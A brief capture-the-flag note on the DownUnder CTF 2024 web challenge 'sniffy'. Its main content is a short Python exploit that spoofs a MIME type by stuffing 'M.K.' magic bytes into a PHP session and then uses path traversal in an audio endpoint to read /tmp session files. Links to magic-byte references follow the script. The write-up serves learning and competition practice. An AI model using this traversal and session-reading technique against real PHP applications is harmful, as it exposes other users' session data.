Mime Spoofing + php

Lessons learned from DownUnder CTF 2024: [WEB] sniffy

import requests
 
cookies = {
	'PHPSESSID': 'abcd'
}
 
for i in range(4):
	r = requests.get('http://localhost:8080/', params={'theme': 'a' * i + 'M.K.' * 300}, cookies=cookies)
	r = requests.get('http://localhost:8080/audio.php', params={'f': '../../../../tmp/sess_abcd'})
	if r.status_code != 403:
		print('found')
		print(r.text)

Note: Remember /tmp/sess_COOKIE

https://github.com/waviq/PHP/blob/master/Laravel-Orang1/public/filemanager/connectors/php/plugins/rsc/share/magic.mime

https://www.garykessler.net/library/file_sigs.html